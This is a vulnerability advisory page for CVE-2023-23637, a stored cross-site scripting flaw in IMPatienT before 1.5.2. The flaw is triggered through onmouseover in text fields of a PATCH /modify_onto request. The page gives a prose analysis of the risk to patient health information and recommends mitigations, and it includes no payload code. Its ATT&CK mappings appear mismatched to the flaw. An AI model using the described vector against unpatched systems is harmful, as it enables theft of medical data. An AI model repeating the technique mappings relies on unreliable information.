CVE-2023-23637 in IMPatienT
Summary
by MITRE • 01/18/2023
IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 10/14/2025
The vulnerability identified as CVE-2023-23637 affects IMPatienT versions prior to 1.5.2 and represents a critical stored cross-site scripting flaw that specifically targets the ontology builder component. This vulnerability arises from insufficient input validation and output encoding mechanisms within the PATCH /modify_onto request handler, where certain text fields fail to properly sanitize user-supplied data containing malicious onmouseover event handlers. The flaw exists within the web application's data processing pipeline, allowing attackers to inject persistent malicious scripts that execute in the context of other users who interact with the affected content.
The technical exploitation of this vulnerability occurs through the manipulation of text fields within the ontology builder interface, specifically targeting the PATCH endpoint used for modifying ontology structures. When an attacker submits malicious content containing onmouseover JavaScript handlers through the PATCH /modify_onto request, the application stores this data without proper sanitization. The stored payload then executes whenever legitimate users view or interact with the affected ontology elements, creating a persistent XSS attack vector that can be leveraged for various malicious activities including session hijacking, credential theft, and data exfiltration. This vulnerability directly maps to CWE-79, which describes Cross-Site Scripting flaws, and represents a specific implementation weakness in the application's input validation and output encoding processes.
The operational impact of this vulnerability is particularly severe in healthcare environments where Protected Health Information (PHI) is routinely processed and stored. Attackers can leverage this stored XSS vulnerability to steal PHI by executing malicious scripts that capture user credentials, session tokens, or directly access sensitive patient data through the application's data access mechanisms. The persistent nature of stored XSS means that the malicious payload remains active even after the initial injection, allowing attackers to maintain access and continue harvesting information over extended periods. This vulnerability creates a significant risk for healthcare organizations as it can be used to compromise patient privacy, potentially leading to compliance violations under regulations such as HIPAA, and can result in substantial financial penalties and reputational damage.
Mitigation strategies for this vulnerability should prioritize immediate patching of the application to version 1.5.2 or later, which includes proper input validation and output encoding mechanisms to prevent malicious script injection. Organizations should implement comprehensive input sanitization at multiple layers, including application-level validation, proper HTML escaping of user-supplied content, and Content Security Policy (CSP) headers to restrict script execution. Additionally, security monitoring should be enhanced to detect unusual patterns in PATCH requests and to implement regular security scanning of user-generated content within the ontology builder. The vulnerability demonstrates the critical importance of implementing defense-in-depth strategies and proper secure coding practices, particularly in applications handling sensitive data, and aligns with ATT&CK technique T1566.001 for initial access through malicious content and T1071.004 for application layer protocol usage. Regular security assessments and vulnerability management processes should be strengthened to prevent similar issues in other components of the healthcare information system infrastructure.